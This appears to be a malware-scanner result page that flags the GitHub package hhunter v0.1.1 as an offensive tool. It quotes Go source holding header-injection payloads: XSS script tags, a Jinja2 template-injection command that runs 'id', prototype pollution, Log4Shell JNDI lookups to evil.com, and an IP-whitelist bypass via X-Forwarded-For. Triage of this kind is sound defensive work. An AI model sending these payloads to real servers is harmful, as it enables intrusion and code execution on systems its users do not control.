Hostile 93% go Download

github.com/cc1a2b/hhunter v0.1.1

Self-updating offensive security tool

Detects indicators in server logs that indicate an exploitation attempt of CVE-2021-44228Detects obfuscated indicators in server logs that indicate an exploitation attempt of CVE-2021-44228

Evidence

XSS attack category label injection.go · lines 1–11
1package headers
2
3import "github.com/cc1a2b/HHunter/engine"
4
5func GetInjectionMutations() []engine.Mutation {
6 return []engine.Mutation{
7 // ===================================================================
8 // XSS — Reflected via Header Values
9 // ===================================================================
10 {Header: "X-Custom-Header", Value: `<script>alert(1)</script>`, Category: "Injection", Impact: "Reflected XSS via Header"},
11 {Header: "X-Custom-Header", Value: `'"><img src=x onerror=alert(1)>`, Category: "Injection", Imp …
RCE attack category label injection.go · lines 37–40
37:61… ory: "Injection", Impact: "SSTI Velocity Assign"},
38
39 // Jinja2 RCE (Python)
40 {Header: "X-Custom-Header", Value: "{{config.__class__.__init__.__globals__['os'].popen('id').read()}}", Category: " …
Native HTTP JSON content type injection.go · lines 82–84
82:100… ection", Impact: "Prototype Pollution via Header"},
83 {Header: "Content-Type", Value: "application/json;__proto__[polluted]=true", Category: "Injection", Impact: "Prototype Pollution Content-Type"},
84 {Header: "X-Custom-Header", Va …
Log4Shell JNDI lookup payload injection.go · lines 102–106
102:3… // ===================================================================
103 // Basic protocols
104 {Header: "X-Api-Version", Value: "${jndi:ldap://evil.com/a}", Category: "Injection", Impact: "Log4Shell LDAP via Header"},
105 {Header: "X-Forwarded-For", Value: "${jndi:ldap://evil.com/a}", Category: "Injection", Impact: "Log4Shell via XFF"},
106 {Header: "Accept-Language", Value: "${jndi:ldap://evil.com/ …
Skill claims access-list bypass USAGE.md · lines 179–197
179:104… ��──────
180[!] Finding #1
181 Header: X-Forwarded-For
182 Payload: 127.0.0.1
183 Impact: IP Whitelist Bypass
184 Category: Proxy
185 Severity: Critical
⋯12 lines

Showing the top 5 files — 7 more files (46 regions) not shown.

No evidence locations were recorded for this file. Raw result

Keyboard shortcuts on this page: j for the next sample, k for the previous one, x to go back to the feed, d to download the original bytes, r to re-queue the sample for analysis.